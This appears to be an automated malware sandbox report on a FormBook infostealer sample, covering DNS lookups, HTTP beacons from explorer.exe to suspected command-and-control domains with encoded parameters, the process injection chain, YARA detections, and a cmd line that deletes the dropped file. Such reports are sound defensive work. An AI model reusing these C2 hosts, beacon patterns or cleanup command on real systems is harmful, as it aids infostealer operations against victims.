                                                                  Aug 3, 2021 18:07:56.952785969 CEST192.168.2.68.8.8.80xa4fdStandard query (0)www.utformehagen.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:08.066272974 CEST192.168.2.68.8.8.80x71f3Standard query (0)www.panyu-qqbaby.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:13.457308054 CEST192.168.2.68.8.8.80x8a04Standard query (0)www.nicolettejohnsonphotography.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:18.559139967 CEST192.168.2.68.8.8.80x2aefStandard query (0)www.kitkatmp3.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Aug 3, 2021 18:07:12.437820911 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com74.206.228.78A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.437820911 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com173.239.5.6A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.437820911 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com173.239.8.164A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.437886000 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com74.206.228.78A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.437886000 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com173.239.5.6A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.437886000 CEST8.8.8.8192.168.2.60x8498No error (0)www.regarta.com173.239.8.164A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:17.776156902 CEST8.8.8.8192.168.2.60x5fe7No error (0)www.tapdaugusta.comtapdaugusta.comCNAME (Canonical name)IN (0x0001)
                                                                  Aug 3, 2021 18:07:17.776156902 CEST8.8.8.8192.168.2.60x5fe7No error (0)tapdaugusta.com34.102.136.180A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:22.973524094 CEST8.8.8.8192.168.2.60xa868No error (0)www.profitsnavigator.comprofitsnavigator.comCNAME (Canonical name)IN (0x0001)
                                                                  Aug 3, 2021 18:07:22.973524094 CEST8.8.8.8192.168.2.60xa868No error (0)profitsnavigator.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:28.426587105 CEST8.8.8.8192.168.2.60x161cNo error (0)www.konversationswithkoshie.netkonversationswithkoshie.netCNAME (Canonical name)IN (0x0001)
                                                                  Aug 3, 2021 18:07:28.426587105 CEST8.8.8.8192.168.2.60x161cNo error (0)konversationswithkoshie.net34.102.136.180A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:33.662112951 CEST8.8.8.8192.168.2.60x606eNo error (0)www.advancedautorepairsonline.com104.168.135.142A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:39.550025940 CEST8.8.8.8192.168.2.60xd3fbNo error (0)www.lovertons.com107.165.13.75A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:45.027869940 CEST8.8.8.8192.168.2.60x7a1fNo error (0)www.sdmdwang.com112.213.96.11A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:50.635329008 CEST8.8.8.8192.168.2.60xf741No error (0)www.sdmdwang.com112.213.96.11A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:51.926891088 CEST8.8.8.8192.168.2.60x41dcServer failure (2)www.sunilpsingh.comnonenoneA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:57.142524004 CEST8.8.8.8192.168.2.60xa4fdNo error (0)www.utformehagen.com45.39.95.186A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:08.105159044 CEST8.8.8.8192.168.2.60x71f3No error (0)www.panyu-qqbaby.companyu-qqbaby.comCNAME (Canonical name)IN (0x0001)
                                                                  Aug 3, 2021 18:08:08.105159044 CEST8.8.8.8192.168.2.60x71f3No error (0)panyu-qqbaby.com107.160.109.196A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:13.495903015 CEST8.8.8.8192.168.2.60x8a04No error (0)www.nicolettejohnsonphotography.com185.53.177.11A (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:08:18.765559912 CEST8.8.8.8192.168.2.60x2aefNo error (0)www.kitkatmp3.com156.224.60.3A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.regarta.com
                                                                  • www.tapdaugusta.com
                                                                  • www.profitsnavigator.com
                                                                  • www.konversationswithkoshie.net
                                                                  • www.advancedautorepairsonline.com
                                                                  • www.lovertons.com
                                                                  • www.utformehagen.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.64973074.206.228.7880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:12.548222065 CEST3920OUTGET /weni/?Fzr4otMh=vK5NYeOz5XkzOmNWKQvXOgoJo3oDs/IT/QpSrvoL9TxdOASFPAP+KPQhIJ5bhzx72Ujc1GJYaw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.regarta.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:12.649118900 CEST3920INHTTP/1.1 302 Moved Temporarily
                                                                  Server: nginx/1.18.0
                                                                  Date: Tue, 03 Aug 2021 16:07:12 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 145
                                                                  Connection: close
                                                                  Location: http://www.regarta.com/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.64973134.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:17.797780991 CEST3921OUTGET /weni/?Fzr4otMh=5QGyFhC7d8SOfupCgf8D8L5Dw1IpKGdMSRgbjgwl2q0Kak4r1qcSYI6TGyMZI/ki/MDg/v9Fdw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.tapdaugusta.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:17.910999060 CEST3922INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Tue, 03 Aug 2021 16:07:17 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "6104831f-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.649732184.168.131.24180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:23.147452116 CEST3923OUTGET /weni/?Fzr4otMh=BkpYm0nbd5ib+/fSGFV7l4XaMZIYy+faJJ1LkwLIu9AW6SncOXGggY2R9QUt+6zEXxQtwdedUg==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.profitsnavigator.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:23.338002920 CEST3923INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.16.1
                                                                  Date: Tue, 03 Aug 2021 16:07:23 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Location: https://roipanel.com?link&usr=5291&lid=10053&source=FBprofile
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.64973434.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:28.445873022 CEST3924OUTGET /weni/?Fzr4otMh=ztAjwXyjR8Zhmz6qNG99UeVM/COU9vlr0gZS07ceR8+f8+nH1SwRALtGHqnV1JfTHENGVYv16A==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.konversationswithkoshie.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:28.559362888 CEST3925INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Tue, 03 Aug 2021 16:07:28 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "6104856e-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.649737104.168.135.14280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:33.871361971 CEST3935OUTGET /weni/?Fzr4otMh=+KyOLC6TyuKR3+iFgbwKS8GxhsjIjrhtsitDR0G1PeYPvoj9xIz7F4EITJbrl7lY/KKYumYMjw==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.advancedautorepairsonline.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:34.070441008 CEST3935INHTTP/1.1 403 Forbidden
                                                                  content-type: text/html
                                                                  content-length: 206
                                                                  x-powered-by: PHP/5.6.40
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 65 6e 69 2f 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /weni/ on this server.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.649740107.165.13.7580C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:39.743015051 CEST4012OUTGET /weni/?Fzr4otMh=jQINVx1WLgI4Q78PxoFZgdCbTp62zPlUZKvRDpdtPyf3UmqyZOBTcqkgr6daQI/TgYuIT4+N1g==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.lovertons.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.64974845.39.95.18680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Aug 3, 2021 18:07:57.333901882 CEST4938OUTGET /weni/?Fzr4otMh=9kFoto4nIUhkgP3Es+H36/ZMz7ns/MT8S+V4osXmeDelDelWvdLQo7Pbd8Te03qiHXqAR+RcrA==&aRbdj=q6AlsppXkR0txTj HTTP/1.1
                                                                  Host: www.utformehagen.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Aug 3, 2021 18:07:57.519463062 CEST4938INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Tue, 03 Aug 2021 16:07:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1.0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:18:06:00
                                                                  Start date:03/08/2021
                                                                  Path:C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe'
                                                                  Imagebase:0x1c0000
                                                                  File size:1263616 bytes
                                                                  MD5 hash:D726EC6E056461DD7D3CE8890C3C9A4E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:18:06:05
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Imagebase:0xfd0000
                                                                  File size:45152 bytes
                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:06:07
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff6f22f0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:06:28
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\SysWOW64\autofmt.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                  Imagebase:0x330000
                                                                  File size:831488 bytes
                                                                  MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:18:06:28
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                  Imagebase:0x900000
                                                                  File size:36864 bytes
                                                                  MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:18:06:32
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                  Imagebase:0x2a0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:06:33
                                                                  Start date:03/08/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >